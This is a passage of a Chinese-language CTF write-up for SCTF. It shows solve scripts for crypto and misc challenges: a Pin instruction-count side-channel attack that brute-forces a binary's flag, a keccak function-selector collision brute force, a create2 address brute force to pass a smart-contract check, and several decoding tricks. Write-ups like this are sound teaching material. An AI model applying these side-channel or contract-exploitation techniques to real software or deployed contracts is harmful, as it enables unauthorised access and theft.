c.OnePlus() else: k//=2 c.Double() return c.val() p=7580404339410605275626408632293985390119410811758716323067754026905773097627216054700243523685903084284434158078654472410013702925363551739091210471600391 q=8494638672381712426688477470653430477269594977016930662854015708761990399918086769491700011694720852848575947599954053177997043739645079780483579065896793 phi=(p*p-1)*(q*q-1) e=65537 d=invert(e,phi) msg=PowPlus(val,d) print(msg) ''' flag=(13458941155903781745318542945248240520288022871426293450041877950876934401820075861658649941877200506804179539037273445647178076379765310943409348968500704892576232812799061850508823209830576134649486426818217295514628123166401568455514599, 6941688215698327989241745769756907425148630013096044042603905768142844248813832790128191811856003007063084884943722942299621842637652050853355451338819196414391565056348609341946213402001658140600019834638926985700204831449557863272939839) flag=bytes_to_long(long_to_bytes(flag[0])+long_to_bytes(flag[1])) print(flag) #求a,b,x p= 12827136631950660209216359962655539318636877290716821157529934201187219916291097512646340799814928196320503957951369709433553128222068986394496491383172957 PR.<a,b,x> = PolynomialRing(Zmod(p)) def g(): global a, b, x x = a*x + b return x f=[g() for _ in range(6)] X=[[i**j for j in range(0,6)] for i in range(1,5)] vs=vs= [(1, 41380349828344668841722013593988154321093099094259357736377736864534670060706791545109606752287504685771188039864996559723310519654574206262666374726529575), (2, 384991383452695588666216941014720946683784460631264884797727791455132234632438790091275812930469701960771509347594917989067900680524277581738313254612711871), (3, 2324819542625170348844359780621276807555503871252850096339863557086701529895982915686058495680950841284900600209950521822433876540926171344905286018406959743), (4, 9038337376811138597523510592313164861722600343233504981317555262132010358260176119807566000121093361554267202529233467631393363767071867844509978588374760233)] 
fx=[sum([ t*l for t,l in zip(f,X[i])])-vs[i][1] for i in range(4)] I= ideal(fx) res=I.variety() print(res) #{a: 9860193694955454493300669933320904531057702167008792383985842819906078670580802987731895663413356860994843912318440780246676743568551475523420776908741413, b: 2958518750440700920796763935867151936933867742211437957765135895192638631654440432476368712469580981169108680123754523389166157366216732312196552911319913, x: 7734812378399820171163995318293652173453261567870977388529908085981201925492169234860698753203222342796394099866681768405890780154318583282220110890441936} #最后解同余方程 p=12827136631950660209216359962655539318636877290716821157529934201187219916291097512646340799814928196320503957951369709433553128222068986394496491383172957 a=9860193694955454493300669933320904531057702167008792383985842819906078670580802987731895663413356860994843912318440780246676743568551475523420776908741413 b=2958518750440700920796763935867151936933867742211437957765135895192638631654440432476368712469580981169108680123754523389166157366216732312196552911319913 x=7734812378399820171163995318293652173453261567870977388529908085981201925492169234860698753203222342796394099866681768405890780154318583282220110890441936 def g(): global a, b, x x=(a*x+b)%p return x PR.<X> = PolynomialRing(Zmod(p)) f = g() + g()*X + g()*X**2 + g()*X**3 + g()*X**4 + g()*X**5 f=f-350564116714246428053802172070389474233820454679751477780333001945330301565284220095378516478556445046920811976843797532587184369824085245405082799485151297628128033782611724987963819163245257329754695802584996154786305817413634573781285885239952095626683987775731171250077614548234305028236410536510063272314122315196083472829068485752967550562846302833889516005729928622362083333892583681788035557019567883417091108619687009927945069447260541066489511357746392173728172212543 print(f.roots()) #34252413418138665913069510570108663017477763145042638644010243453 #SCTF{all1Want4ChristmasisU} ``` ## Misc: ### fumo_xor_cli: 
命令行里的图片用WMCTF2021那道题的方式提取出所有图片,其中第21/27张都是像素点,脚本如下: ```python from pwn import * r = remote("124.70.150.39", 2333) r.recv() while True: data = r.recv() f = open("data.txt", "ab").write(data) import re from PIL import Image pixel_pattern = b"\[38;2;(.*?);(.*?);(.*?)m" p = re.compile(pixel_pattern) f = open("data.txt", "rb").read() li = f.split(b"\n\n") j = 0 for content in li: byte_pixels = p.findall(content) pixels = [] for pixel in byte_pixels: r = int(pixel[0]) g = int(pixel[1]) b = int(pixel[2]) pixels.append((r, g, b)) print(pixels) width = 133 height = 50 img = Image.new("RGB", (width, height)) i = 0 for y in range(height): for x in range(width): pixel = pixels[i] img.putpixel((x, y), pixel) i = i + 1 filename = str(j) + ".png" img.save(filename) j = j + 1 ``` 在cli中还得到https://mp.weixin.qq.com/s/E_iDJBkVEC4jZanzvqnWCA ![](https://i.imgur.com/gecrC5u.png) 文章末尾有 ![](https://i.imgur.com/TRKzR5V.png) 很明显的像素点在里面,查看原图提取出一张133*100的像素点图,cli中的为133*50的像素点图,反复旋转拼接尝试,27在上21在下,与提取图片异或得到flag图片 ![](https://i.imgur.com/bUNtPFX.png) 反色后得到 ![](https://i.imgur.com/swIMpBK.png) 又因为本题无数字所以 Flag:`SCTF{Good_FuMo_CTF_OvO}` ### low_re: 首先程序运行的时候转储内存得到以下字符串 ``` [ANSI] 0x0001a450: please input your flag: [ANSI] 0x0001a470: cline_in_traceback [ANSI] 0x0001a490: hello challanger [ANSI] 0x0001a4a8: you are right [ANSI] 0x0001a4b8: tmpj25m9hqm [ANSI] 0x0001a4c8: hexdigest [ANSI] 0x0001a4d8: encoding [ANSI] 0x0001a4e8: Sycl0ver [ANSI] 0x0001a4f8: hashlib [ANSI] 0x0001a500: dataLen [ANSI] 0x0001a508: update [ANSI] 0x0001a50f: sha256 [ANSI] 0x0001a518: __import__ [ANSI] 0x0001a523: append [ANSI] 0x0001a52a: utf-8 [ANSI] 0x0001a530: range [ANSI] 0x0001a536: print [ANSI] 0x0001a53c: input [ANSI] 0x0001a542: error [ANSI] 0x0001a548: __test__ [ANSI] 0x0001a558: __name__ [ANSI] 0x0001a568: __main__ [ANSI] 0x0001a571: exit [ANSI] 0x0001a576: data ``` hash表: ``` [ANSI] 0x0001a0a0: 97e45e15c74f71ea59ffffb40298f2e5dec119c2205e434e3a0d2510c331037f [ANSI] 0x0001a100: 
85ddd3721d173367465373f75e190bd937a8dc3588d5d82ebff8104dec88ac3e [ANSI] 0x0001a160: 78f92a6ad9ffcec47f30e3ca3d18065bdba9c020ff5f477b801d11efdfaa9cd0 [ANSI] 0x0001a1c0: 62c62ce7768a4836b10495317a32da6e3943d522bc3b9797ff0a44931e966a31 [ANSI] 0x0001a220: 54cb43f463ea082699131b71d45fb0384f8c2f598e8f0072b960b4add731e048 [ANSI] 0x0001a280: 52080868c07a9ef5646b5f0b198f04f013cf23cfbfb06123d8f2fdd63d359123 [ANSI] 0x0001a2e0: 51b7d78cfe25ede262fd85a65b24721f076ab9dd6562403878ca5cde1ebf3219 [ANSI] 0x0001a340: 5023939dca9273fd767d5e4ea329846f9816af461e170b6db8d20b6e5ff3de8c [ANSI] 0x0001a3a0: 1a6aafb16a23ffde40c426d5c87f5afcc77fffc96cf041dc8dd2c47e706a7ecb [ANSI] 0x0001a400: 127291de1f4cbbb35c41556a3c6d5a64f08661bc7ed394ea6210354e6218ad93 [ANSI] 0x00019e20: f69b52599973fc5915ad1d435236863252dc3fd460989bd9f56ffc199ef8ff36 [ANSI] 0x00019e80: ee197bbac1b0e09c425e1dfd30cea2506bd493a674c4de90d9afbe5abc700b06 [ANSI] 0x00019ee0: e9552f8c3e518306524fa9c9728ad6dee88fa611aa3068c169217f173964f9b4 [ANSI] 0x00019f40: e6222354b50e4d33d73314b515b325633e57a105758e20aca23eb2dadd625f3f [ANSI] 0x00019fa0: d6eeac4ea40f9513391ef0bf72aa2fd2588889cb9d5f4cc638ce4d2c5509527b [ANSI] 0x0001a000: a1cd6c7990abb6b271695381d78898ec5c4880fbc0f6a0c9fda064422f21361e ``` 通过hash数量以及pintools的返回结果测出flag长度为17 (其工作原理是每次输入对了,就指令数量会多很多) 写脚本进行侧信道攻击 ```python import subprocess password = "_________________" pos = 0 last_cnt = 630000000 delta = 29000000 import string table = string.printable[:94] for i in range(17): for j in table: cur_pwd = password[0:pos] + j + password[pos + 1:] print ('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe echo ' + cur_pwd + ' | .\\pin.exe -t source\\tools\\ManualExamples\\obj-intel64\\inscount0.dll -- .\\low_re') subprocess.call('C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe echo ' + cur_pwd + ' | .\\pin.exe -t source\\tools\\ManualExamples\\obj-intel64\\inscount0.dll -- .\\low_re', shell=True) res = int(open("inscount.out").read().split()[-1]) if res > 
last_cnt + delta: last_cnt = res password = cur_pwd pos += 1 break print(password) ``` ![](https://i.imgur.com/ECgCz1Z.png) 成功截图 ![](https://i.imgur.com/n3FFqmv.png) Flag:`SCTF{S1deCh4nnelAtt@ck}` ### This_is_A_tree: 根据目录名判断压缩包结构是一棵二叉树,中序遍历后得到 ``` Q2hpbmVzZSB0cmFkaXRpb25hbCBjdWx0dXJlIGlzIGJyb2FkIGFuZCBwcm9mb3VuZCEgU28gSSBXYW50IEdpdmUgWW91IE15IEZsYWcgQnV0IFlvdSBOZWVkIERlY29kZSBJdC5FbmpveSBUaGUgRmxhZyEhOuW4iCDlhZEg5aSNIOaNnyDlt70g6ZyHIOaZiyDlp6Qg5aSn6L+HIOiuvCDlmazll5Eg6ZyHIOaBkiDoioIg6LGrIA== ``` base64decode ![](https://i.imgur.com/dIMDcOQ.png) ``` Chinese traditional culture is broad and profound! So I Want Give You My Flag But You Need Decode It.Enjoy The Flag!!:师 兑 复 损 巽 震 晋 姤 大过 讼 噬嗑 震 恒 节 豫 ``` 后面的字符是天干地支的64卦 ``` 师 兑 复 损 巽 震 晋 姤 大过 讼 噬嗑 震 恒 节 豫 ``` 直接上转换脚本: ```python s='师兑复损巽震晋姤大过讼噬嗑震恒节豫' dic={'坤': '000000', '剥': '000001', '比': '000010', '观': '000011', '豫': '000100', '晋': '000101', '萃': '000110', '否': '000111', '谦': '001000', '艮': '001001', '蹇': '001010', '渐': '001011', '小过': '001100', '旅': '001101', '咸': '001110', '遁': '001111', '师': '010000', '蒙': '010001', '坎': '010010', '涣': '010011', '解': '010100', '未济': '010101', '困': '010110', '讼': '010111', '升': '011000', '蛊': '011001', '井': '011010', '巽': '011011', '恒': '011100', '鼎': '011101', '大过': '011110', '姤': '011111', '复': '100000', '颐': '100001', '屯': '100010', '益': '100011', '震': '100100', '噬嗑': '100101', '随': '100110', '无妄': '100111', '明夷': '101000', '贲': '101001', '既济': '101010', '家人': '101011', '丰': '101100', '离': '101101', '革': '101110', '同人': '101111', '临': '110000', '损': '110001', '节': '110010', '中孚': '110011', '归妹': '110100', '睽': '110101', '兑': '110110', '履': '110111', '泰': '111000', '大畜': '111001', '需': '111010', '小畜': '111011', '大壮': '111100', '大有': '111101', '夬': '111110', '乾': '111111'} li=[] k=0 for i in range(len(s)): if k ==1: k=0 continue try: li.append(dic[s[i]]) except: t='' t=t+s[i]+s[i+1] li.append(dic[t]) k=1 ss=''.join(li) print(ss) enc='' for i in range(0,len(ss),8): 
enc+=chr(eval('0b'+ss[i:i+8])) print(enc) #010000110110100000110001011011100100000101011111011110010111100101100100011100110010000100 #Ch1nA_yyds! ``` Flag:`SCTF{Ch1nA_yyds!}` ### August 10, 2021: 碰撞4字节函数签名,满足下面关系即可 ``` res1 = 'func' + s + '(address,uint256)' if(Web3.keccak(text=res1).hex()[:10] == '0x80e10aa5'): ``` 16线程版: ```python from web3 import Web3 from pwn import * import _thread NUMBER_OF_THREAD = 16 def bf(idx): i = 0 cnt = 0 while True: s=str(i) #print(s) res1 = 'f' + s + '(address,uint256)' tmp = Web3.keccak(text=res1).hex()[:10] if(tmp == '0x80e10aa5') or (tmp == '0xa6f9dae1'): print(res1) break i = NUMBER_OF_THREAD*cnt + idx cnt +=1 def exp(): try: for i in range(NUMBER_OF_THREAD): _thread.start_new_thread(bf, (i,)) except: print("Error: unable to start thread") while 1: pass if __name__ == "__main__": exp() ``` go16线程版: ```go package main import ( "fmt" "strconv" "strings" "github.com/ethereum/go-ethereum/crypto" ) func bf(idx uint64) { var NUMBER_OF_THREAD uint64 = 16 var i uint64 = 18446744073709551615 var cnt uint64 = 0 for true { tmp := "f" + strconv.FormatUint(i, 10) + "(address,uint256)" hash := crypto.Keccak256Hash([]byte(tmp)) //fmt.Println(i) if strings.ToLower(hash.Hex()[:10]) == strings.ToLower("0x80e10aa5") || strings.ToLower(hash.Hex()[:10]) == strings.ToLower("0xa6f9dae1") { fmt.Println(tmp) break } i -= (NUMBER_OF_THREAD*cnt + idx) cnt += 1 } } func main() { var i uint64 = 0 for ; i < 16; i++ { go bf(i) bf(i) //fmt.Println(i) } } ``` 跑出来结果f17228387697868061535(address,uint256) 直接调用CallForAirDropmintor即可 ![](https://i.imgur.com/ZdgMANk.png) ![](https://i.imgur.com/k33Xz9u.png) ### in_the_vaporwaves: 谷歌冲浪发现一篇帖子https://dev.to/k0p1/stacks-2020-ctf-voices-in-the-head-forensic-1bea 一模一样的操作用Sonic Visualiser(https://www.sonicvisualiser.org/)看频谱图 ![](https://i.imgur.com/gzX1IiE.png) 
底下内容转为摩斯电码:

`.../-.-./-/..-./-.././.../.----/.-./...--/..--.-/-../.-./../...-/./.../..--.-/../-./-/-----/..--.-/...-/.-/.--./---/.-./.--/.--.-./...-/./...`

解码得到 `SCTFDES1R3_DRIVES_INT0_VAPORW@VES`

### Constructor?:

`0x0000000000000000000000000000000000000002` 是一个特殊地址(SHA-256 预编译合约):它的合约代码长度为 0,但调用它的返回值长度不为 0。这也说明"代码长度为 0"并不代表调用该地址没有返回数据,合约里不应以此作为判断依据。

然后就是考察 create2 的地址计算方式:新合约地址取 `keccak256(0xff ++ 部署者地址 ++ salt ++ keccak256(init_code))` 的低 20 字节。爆破出一个合约,其内容是设置 `sstore(0,1)`,并且合约地址按十进制数值比较小于 `uint(0x0001000000000000000000000000000000000000)` 即可;可以简单地让地址的高两个字节为 `0x0000`(爆破)。

合约地址 `0x8996c1789098e00e752414e9d398a3207ba54095`

我的外部账户地址 `0x88D3052D12527F1FbE3a6E1444EA72c4DdB396c2`

```
a = 0x0000000000000000000000000000000000000002
messages = 0x6080604052348015600f57600080fd5b50600160005560058060226000396000f3fe6001600055
salt = 0x000000000000000000000000000000000000000000000000000000000000370d
```

然后调用 registContract 即可,最后调用 payforflag

![](https://i.imgur.com/a4qM2sO.png)